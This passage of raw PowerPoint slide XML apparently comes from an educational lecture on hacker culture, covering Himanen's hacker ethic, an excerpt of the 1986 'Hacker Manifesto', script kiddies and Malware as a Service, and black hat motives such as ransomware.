              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Finnish philosopher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pekka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Himanen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, in his work </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>«</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>The hacker ethics and the spirit of the information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>»</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>has the aim of redeeming the original meaning of the term "hacker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hacker ethics is founded on the value of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>creativity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and consists in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>combining passion with freedom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Money ceases to be a value in itself and the benefit is measured in results such as social value and free access, transparency and openness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Hackers, by sharing resources and forming communities in which there is a continuous and constant exchange of information and teachings, recover values typical of modern European society, giving new vigor to the ethics of citizenship;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computer plays a central role in this ethics, increasing freedom of expression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original meanings of the terms capitalism and hacker go in opposite directions: on the one hand we have the importance of money and the growth of capital, while on the other we have a passionate and free from schemes activity.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An evidence of the latest statement could be the expensive taxes that people has to pay to obtain good education in the USA.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="229551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547A752A-603B-4B1F-85DD-B8AEEFD22FC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2947D150-1020-4C73-86B1-4218421978EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>The hacker manifesto</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7" descr="Immagine che contiene persona&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A048B58D-5E76-4687-9840-D8935E884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592" y="1838625"/>
            <a:ext cx="2711628" cy="3790650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="CasellaDiTesto 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F5CD926-AE5C-4A85-B002-2DBC0A6AFC03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432000" y="1066800"/>
            <a:ext cx="8273850" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>The hacker manifesto (or «the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>conscience</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of a hacker») </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>essay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>written</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Loyd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Blankenship</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, alias </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>Mentor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="CasellaDiTesto 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78365ECC-7389-4181-AC8A-E2A0BB8697AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4568925" y="6282193"/>
            <a:ext cx="6267450" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.phrack.org/archives/issues/7/3.txt</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="CasellaDiTesto 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDFC4DA8-9B1A-44BD-9605-954A1EEB3720}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581025" y="1971675"/>
            <a:ext cx="8201025" cy="424731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&lt;&lt;[..] We make use of a service already existing without paying</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>for what could be dirt-cheap if it wasn't run by profiteering gluttons, and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>you call us criminals.  We explore... and you call us criminals.  We seek</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>after knowledge... and you call us criminals.  We exist without skin color,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>without nationality, without religious bias... and you call us criminals.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You build atomic bombs, you wage wars, you murder, cheat, and lie to us</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>and try to make us believe it's for our own good, yet we're the criminals.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Yes, I am a criminal.  My crime is that of curiosity.  My crime is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>that of judging people by what they say and think, not what they look like.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>My crime is that of outsmarting you, something that you will never forgive me</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>for.</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 am a hacker, and this is my manifesto.  You may stop this individual,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>but you can't stop us all... after all, we're all alike.&gt;&gt;</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502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7546873-2319-48BC-927F-048C746FDDA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{194954FA-01A8-4A3F-9BF9-B6F67E4D294F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>What</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a hacker: script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>kiddies</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CasellaDiTesto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3AF97F4-F9BB-4D8E-8187-10DEEFF7DDBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432000" y="1219200"/>
            <a:ext cx="91311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 script kiddie, or often called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>skiddie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, is an unskilled individual who uses scripts or programs, such as a web shell, developed by others to attack computer systems and networks and deface websites.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Script kiddies lack, or are only developing, programming skills sufficient to understand the effects and side effects of their actions.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a result, they leave significant traces which lead to their detection, or directly attack companies which have detection and countermeasures already in place, or in some cases, leave automatic crash reporting turned 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Who are today script kiddies with the advent of the so called “Malware as a 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There</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>certainly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>still</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>skiddies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>there</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>but</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> «Malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a Service» </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>sobstituted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>lot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>them</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Immagine 12" descr="Immagine che contiene testo, finestra&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{162C0516-28C4-4267-884A-82DEB5673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113" y="3429000"/>
            <a:ext cx="2630637" cy="2595562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92990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8D1D8B7-D345-4AC5-BD3D-EC6634E99DDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EE2D8BD-879C-43B3-8D38-009459C9947D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Black </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>hats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>: the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>bad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>ones</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="CasellaDiTesto 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8072409-D2D0-4F4A-9035-D6340852AE11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528506" y="1015068"/>
            <a:ext cx="91311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Black hat hackers are the stereotypical illegal hacking groups often portrayed in popular culture, and are "the epitome of all that the public fears in a computer criminal".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kind of hacker breaks into secure networks to destroy, modify, or steal data, or to make the networks unusable for authorized network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aim of their activities could be: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Money</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: a black hat hacker could cipher all the data of the attacked user or company and then ask for a ransom to him/it to restore the data. The kind of malware that does this activity is the so called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and it’s becoming a plague nowadays.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>Fame:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>since</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the start of hacking history, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>every</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> hacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>had</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the dream to penetrate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>most</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> systems to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>demonstrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>absolute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>does</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>exists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>Joy: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>hacking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>funny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>why</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>destroy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>fun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Immagine 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D9CDAB9-5E32-4C36-9A26-FCFCB8758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606" y="181926"/>
            <a:ext cx="2567892" cy="2247486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
